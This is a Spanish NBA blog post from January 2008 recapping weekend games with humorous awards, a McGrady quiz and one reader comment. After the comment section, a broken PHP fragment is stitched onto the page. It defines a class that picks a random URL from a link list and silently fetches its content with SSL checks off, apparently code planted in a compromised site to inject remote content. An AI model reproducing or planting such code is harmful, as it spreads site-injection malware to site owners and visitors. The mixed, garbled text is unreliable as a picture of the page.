La crónica (18-20/01/08)

21 de January de 2008 por MagicJohnson32

La noche del domingo al lunes dejó únicamente un partido, la previsible victoria de los Suns sobre unos Nets que no ganan en Arizona desde el año 93. Incluso en la árida Phoenix ha llovido mucho desde entonces. Los de New Jersey cedieron la noche anterior ante los Clippers tras una prórroga; apenas 19 horas más tarde visitaban a los Suns y el partido tuvo poca historia. La diferencia al final del primer cuarto ya era de 15 puntos y no bajó de 9 en toda la segunda mitad. El habitual juego colectivo de los de D’Antoni pudo más que la buena actuación de Richard Jefferson, autor de 24 puntos. Stoudemire lideró a los suyos con 28 y otros cinco jugadores anotaron en dobles figuras. Incluso el rookie DJ Strawberry dispuso de 21 minutos, en los que logró 6 puntos y 3 asistencias.

El fin de semana nos dejó varias cosas interesantes que resumimos con nuestros habituales premios:

barondavisbulls40Viernes

Nuestro MVP: Baron Davis, con sus 40 puntos, 5 rebotes y 4 asistencias en la victoria de GSW sobre Chicago, es el elegido para el galardón. Otros candidatos fueron Bosh con 35-9-3 mientras su equipo anotaba sólo 89 en su victoria frente Atlanta, y Pau Gasol, que hizo 24-12-5 y 4 tapones para que Memphis ganase por 24 a los Sonics.

El rookie de la noche: El español Juan Carlos Navarro se ganó con creces el premio con 21-4-5 y un tremendo 9 de 12 en tiros, frente al máximo favorito a rookie del año, Kevin Durant, que se quedó en 22 puntos, sin grandes aportaciones en el resto de apartados.

La sorpresa: Otro jugador de Memphis fue también la sorpresa de la noche, ya que Bobby Jones se destapó con 20 puntos, 13 rebotes, 7 asistencias y 3 robos de balón, para unos tremendos 37 de eficiencia, alternando en las posiciones de base, escolta y alero.

La decepción: Sheed Wallace fue el peor jugador entre los titulares de los Pistons, en 34 minutos acabó con 7-7-4, con una muy mala selección de tiro, mala actuación clave para que Detroit fuese derrotado por Sacramento.

Sábadojrichgrizzlies

Nuestro MVP: Jason Richardson atraviesa un momento espectacular y dio buena prueba de ello ante los Grizzlies, a los que les hizo 38 puntos con 10 de 15 en tiros de 2 y 6 de 10 en triples, además de 14 rebotes, 4 asistencias y 3 tapones. Hasta los 49 de eficiencia se disparó J-Rich, que reaccionó de este modo al mal partido que había protagonizado la noche anterior ante los Hornets.

El rookie: está siendo un año complicado para Al Thornton, pero el novato de los Clippers deja muestras de calidad, como anoche en la victoria en la prórroga ante los Nets. 22 puntos, con 8 de 12 en tiros de campo y 5 de 6 en libres, además de 3 rebotes y 2 asistencias, logró el pick 17 del pasado draft, que además ayudó a su equipo a lograr el triunfo con 15 de sus puntos entre el último cuarto y la prórroga.

La sorpresa: no es precisamente un anotador pero el juego intenso y duro de Mikki Moore le da resultados. Ante los Pacers logró 22 puntos con una eficacia altísima, 9 de 12 en tiros de campo, 4 de 4 en libres, y con el añadido de 11 rebotes atrapados.

La decepción: Aunque Rasheed Wallace ha optado seriamente a revalidar su título de decepción de la noche, Kevin Durant y Ricky Davis compitieron tan duramente por el premio que se lo llevan ex aequo. 3 de 12 en tiros, 0 asistencias, 2 rebotes, 1 pérdida, 0 tapones y 0 recuperaciones fueron los números del que se supone jugador franquicia de los Sonics en su partido ante los Mavericks. Por su parte, Ricky Davis contribuyó, como si hiciese falta, a una nueva derrota de los Heat con 1 de 7 en tiros, 3 pérdidas, 0 asistencias, 2 rebotes, 1 robo y 2 puntos.

Pasatiempos:

tmacspursbonner

¿Qué celebra Tracy McGrady?

A) que ya no le duele la espalda

B) que ya no le duele la rodilla

C) que ya no le entrena Jeff Van Gundy

D) que Stern ha eliminado la primera ronda de Playoffs

E) que Bonner falló el tiro para forzar la prórroga

Respuesta correcta: C, McGrady aún no ha visto que el tiro de Bonner no entró y que los Rockets ganaron a los Spurs en el regreso de T-Mac tras 11 partidos de baja. Y, aunque lo hubiese visto, la alegría de librarse de JVG es inigualable.

Entre los acertantes se sorteará el libro de jugadas de Jeff Van Gundy durante su época al frente de los Rockets, consistente en la jugada 1 (dársela a McGrady y que haga lo que pueda) y la jugada 2 (dársela a Yao y que haya lo que pueda).

Comenta

Un comentario a esta entrada

  1. Olafur dice:
    #1

    Juas juas tremendo el libreto de Van Gundy, pena que no acerte la respuesta jajaja

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>